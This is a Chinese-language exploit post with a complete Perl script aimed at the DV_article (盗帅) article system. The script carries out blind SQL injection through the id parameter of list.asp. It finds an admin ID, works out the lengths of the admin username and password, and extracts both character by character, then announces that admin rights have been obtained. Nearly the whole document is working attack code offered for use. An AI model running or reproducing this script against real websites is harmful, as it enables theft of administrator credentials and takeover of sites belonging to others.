expoilt.txt

盗帅文章系统存在变量未处理漏洞,有什么问题请大家指正!

#注意，此代码仅用于测试包含小写字母的口令，对于包含大写字母的口令无效！

#!/usr/bin/perl
#The script Crack user&pass for DV_article system
#Code by wawa@21cn.com
#Grouppage Http://www.Haowawa.com/
#Homepage Http://wawa.Haowawa.com/

use IO::Socket;

system('cls'); 
$ARGC = @ARGV; 
if ($ARGC != 4) 
{ 
   print "\n\n";
   print "\t* The script Crack user&pass for DV_article system *\n";
   print "\n\t   Welcom to www.Haowawa.com && wawa.haowawa.com\n";
   print "\n\tExample: dvTxt.pl 127.0.0.1 /txt/list.asp 53 \"没有找到相关文章\"\n";
   print "\t         dvTxt.pl <host> <way> <articleID> <errInfo>\n\n\n";
   exit; 
} 

$host = @ARGV[0];
$way = @ARGV[1];
$txtid = @ARGV[2];
$errinfo =@ARGV[3];
$port = 80; 

print "\n\t* Welcom to http://www.Haowawa.com && http://wawa.haowawa.com *\n";
print "\n\n开始在 $host 上进行测试,请等待......\n";

for ($adminid=1;$adminid<=100;$adminid++)
{
    $way1 = "?id=$txtid%20AND%20$adminid=(select%20min(id)%20from%20admin%20where%20flag=1)";
    
	&url;@res = &connect;

#print @res;
    
        if ("@res" !~ /$errinfo/) 
           { 
             print "\n\t* 发现一管理员ID号为: $adminid \n";
             last;
           }
}

for ($passlen=1;$passlen<=10;$passlen++)
{
    $way1 = "?id=$txtid%20AND%20$passlen=(select%20len(password)%20from%20admin%20where%20id=$adminid)";

    &url;@res = &connect;
     
        if ("@res" !~ /$errinfo/) 
           {       
             print "\n\t* 发现ID=$adminid的管理员的密码长度为: $passlen 位\n";
             last;
           }
}

for ($userlen=1;$userlen<=20;$userlen++)
{
    $way1 = "?id=$txtid%20AND%20$userlen=(select%20len(username)%20from%20admin%20where%20id=$adminid)";

    &url;@res = &connect;
     
        if ("@res" !~ /$errinfo/) 
           {       
             print "\n\t* 发现ID=$adminid的管理员的用户名长度为: $userlen 位\n";
             last;
           }
}


@dig=(0..9);
@char=(a..z);
@tchar=qw(` ~ ! + @ # $ ^ * \( \) _ = - { } [ ] : " ; < > ? | , . / \\);
@dic=(@dig,@char,@tchar);
@dic1=(@char,@dig,@tchar);

print "\n开始尝试获取ID=$adminid的管理员的用户名及密码,请等待......\n";

for ($userlocat=1;$userlocat<=$userlen;$userlocat++)
{
    foreach $usertemp(@dic1)
    {
        $user=$userdic.$usertemp;

        $way1 = "?id=$txtid%20AND%20'$user'=(select%20mid(username,1,$userlocat)%20from%20admin%20where%20id=$adminid)";

        &url;@res = &connect;
    
        if ("@res" !~ /$errinfo/) 
             {       
                if ($userlocat==$userlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员名字是: $user\n";last;}
				print "\n\t* ID=$adminid的管理员名字的前 $userlocat 位为 $user";
                $userdic=$userdic.$usertemp;
                last;
             }
     }    
}

for ($passlocat=1;$passlocat<=$passlen;$passlocat++)
{
    foreach $passtemp(@dic)
    {
        $pass=$passdic.$passtemp;

        $way1 = "?id=$txtid%20AND%20'$pass'=(select%20mid(password,1,$passlocat)%20from%20admin%20where%20id=$adminid)";

        &url;@res = &connect;
    
        if ("@res" !~ /$errinfo/) 
             {       
                if ($passlocat==$passlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员密码是: $pass";last;}
				print "\n\t* ID=$adminid的管理员密码的前 $passlocat 位为 $pass";
                $passdic=$passdic.$passtemp;
                last;
             }
     }    
}


print "\n\n\n\t* 测试完毕. 获取到一个用户名为$user密码为$pass的管理员权限! *\n";
print "\n\n\n";
#system('pause');

sub url
{
   $req = "GET $way$way1 HTTP/1.0\n".
          "Host: $host\n".
          "Referer: $host\n".
          "Cookie: \n\n";  
}



sub connect 
{
   my $connection = IO::Socket::INET->new(Proto =>"tcp",
                                PeerAddr =>$host,
                                PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

   print $connection $req;
   my @res = <$connection>; 
   close $connection;
   return @res;
}